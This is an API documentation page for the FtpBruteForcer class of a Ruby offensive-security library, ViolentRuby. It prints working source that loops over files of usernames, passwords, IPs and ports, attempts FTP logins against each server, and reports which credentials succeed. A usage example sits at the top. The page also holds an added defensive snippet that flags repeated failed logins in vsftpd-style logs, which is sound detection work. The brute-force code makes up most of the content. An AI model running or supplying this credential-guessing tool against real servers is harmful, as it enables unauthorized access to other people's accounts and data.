Class: ViolentRuby::FtpBruteForcer

Inherits:
Object
Defined in:
lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb

Overview

The Ftp Brute Forcer class provides a simple way to brute-force an FTP server’s credentials.

Examples:

Basic Usage

ftp = FtpBruteForcer.new
ftp.users     = "resources/ftp_users.txt"
ftp.passwords = "resources/ftp_passwords.txt"
ftp.ips       = "resources/ftp_ips.txt"
ftp.ports     = "resources/ftp_ports.txt"
# brute'm!
ftp.brute_force!
# => results

Author:

  • Kent ‘picat’ Gruber

Constructor Details

#initialize(args = {}) ⇒ FtpBruteForcer

Create a new Ftp Brute Forcer.

Parameters:

  • args (Hash) (defaults to: {})

    The options to create a new Ftp Brute Forcer.

  • :users (String)

    The path to a file of users to attempt.

  • :passwords (String)

    The path to a file of passwords to attempt.

  • :ips (String)

    The path to a file of server ips to attempt to connect to.

  • :ports (String)

    The path to a file of service ports to attempt to connect to.



# File 'lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb', line 35

def initialize(args = {})
	@users     = args[:users]     if args[:users]     && File.readable?(args[:users]) 
	@passwords = args[:passwords] if args[:passwords] && File.readable?(args[:passwords])
	@ips       = args[:ips]       if args[:ips]       && File.readable?(args[:ips])
	@ports     = args[:ports]     if args[:ports]     && File.readable?(args[:ports])
	@ftp       = Net::FTP.new
end

Instance Attribute Details

#ips ⇒ Object



# File 'lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb', line 24

def ips
  @ips
end

#passwords ⇒ Object



# File 'lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb', line 22

def passwords
  @passwords
end

#ports ⇒ Object



# File 'lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb', line 26

def ports
  @ports
end

#users ⇒ Object



# File 'lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb', line 20

def users
  @users
end

Instance Method Details

#able_to_login?(args = {}) ⇒ Boolean

Check whether a given IP address, port, username and password can be used to log in.

Parameters:

  • args (Hash) (defaults to: {})
  • :ip (String)
  • :port (String)
  • :username (String)
  • :password (String)

Returns:

  • (Boolean)

# File 'lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb', line 102

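def able_to_login?(args = {})
	@ftp.connect(args[:ip], args[:port])
	@ftp.login(args[:username], args[:password])
	# Net::FTP#login stores the server's final reply in #welcome; this is an
	# exact match on the reply text.
	if @ftp.welcome == "230 Login successful.\n"
		@ftp.close
		return true
	end
	@ftp.quit
	false
rescue
	# Any connection or protocol error is reported as a failed login.
	false
end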

#brute_force(args = {}) ⇒ Object Also known as: brute_force!

Brute force some’a dem FTP login credz.

Parameters:

  • args (Hash) (defaults to: {})

    The options to brute force.

  • :users (String)

    The path to a file of users to attempt.

  • :passwords (String)

    The path to a file of passwords to attempt.

  • :ips (String)

    The path to a file of server ips to attempt to connect to.

  • :ports (String)

    The path to a file of service ports to attempt to connect to.



# File 'lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb', line 50

def brute_force(args = {})
	meets_our_requirements?(args) 
	results   = []
	ips       = args[:ips]        || @ips 
	ports     = args[:ports]      || @ports
	users     = args[:users]      || @users
	passwords = args[:passwords]  || @passwords
	iterate_over(ips).each do |ip|
		iterate_over(ports).each do |port|
			next unless connectable?(ip: ip, port: port)
			iterate_over(users).each do |user|
				iterate_over(passwords).each do |password|
					if able_to_login?(ip: ip, port: port, username: user, password: password)
						result = format_result("SUCCESS", ip, port, user, password)
					else
						result = format_result("FAILURE", ip, port, user, password)
					end
					results << result
					yield result if block_given?
				end
			end
		end
	end
	results
end
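
A defender's view of the loop above, as an added example that is not part of ViolentRuby: every inner iteration is one login attempt, so the server log shows a run of failures from one client across several usernames. The log lines are constructed in vsftpd's log style (an assumed format), and the `detect_ftp_guessing` name and its threshold are assumptions.

```ruby
# Constructed sample lines in vsftpd's log style (assumed format; not from the page).
SAMPLE_LOG = <<~LOG
  Mon Mar  4 10:15:01 2024 [pid 2101] [admin] FAIL LOGIN: Client "203.0.113.7"
  Mon Mar  4 10:15:02 2024 [pid 2103] [admin] FAIL LOGIN: Client "203.0.113.7"
  Mon Mar  4 10:15:03 2024 [pid 2105] [backup] FAIL LOGIN: Client "203.0.113.7"
  Mon Mar  4 10:15:04 2024 [pid 2107] [backup] FAIL LOGIN: Client "203.0.113.7"
  Mon Mar  4 10:15:05 2024 [pid 2109] [backup] OK LOGIN: Client "203.0.113.7"
  Mon Mar  4 10:20:11 2024 [pid 2140] [alice] FAIL LOGIN: Client "198.51.100.20"
  Mon Mar  4 10:20:19 2024 [pid 2142] [alice] OK LOGIN: Client "198.51.100.20"
LOG

# Captures the account name, the outcome and the client address of a login event.
LOGIN_EVENT = /\[pid \d+\] \[(?<user>[^\]]+)\] (?<status>OK|FAIL) LOGIN: Client "(?<ip>[^"]+)"/

# Hypothetical helper: groups login events by client address and returns the
# clients whose failure count reaches fail_threshold. An OK LOGIN seen after
# the threshold was reached is recorded as a likely guessed account.
def detect_ftp_guessing(log, fail_threshold: 4)
  stats = Hash.new { |h, ip| h[ip] = { failures: 0, users: [], compromised: [] } }
  log.each_line do |line|
    event = LOGIN_EVENT.match(line)
    next unless event                      # skip lines that are not login events
    entry = stats[event[:ip]]
    if event[:status] == "FAIL"
      entry[:failures] += 1
      entry[:users] |= [event[:user]]      # distinct usernames tried
    elsif entry[:failures] >= fail_threshold
      entry[:compromised] |= [event[:user]]
    end
  end
  stats.select { |_ip, entry| entry[:failures] >= fail_threshold }
end

if __FILE__ == $PROGRAM_NAME
  detect_ftp_guessing(SAMPLE_LOG).each do |ip, entry|
    puts "#{ip}: #{entry[:failures]} failures, users=#{entry[:users].join(',')}, " \
         "success after failures=#{entry[:compromised].join(',')}"
  end
end
```

A single mistyped password, like the `alice` entry, stays below the threshold and is not reported.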

#connectable?(args = {}) ⇒ Boolean

Check if a given IP address and port can be connected to.

Parameters:

  • args (Hash) (defaults to: {})

    The options to brute force.

  • :ip (String)

    The ip address to attempt to connect to.

  • :port (String)

    The port to attempt to connect to.

Returns:

  • (Boolean)

# File 'lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb', line 85

def connectable?(args = {})
	@ftp.connect(args[:ip], args[:port])
	return true if @ftp.last_response_code == "220"
	false
rescue
	false
end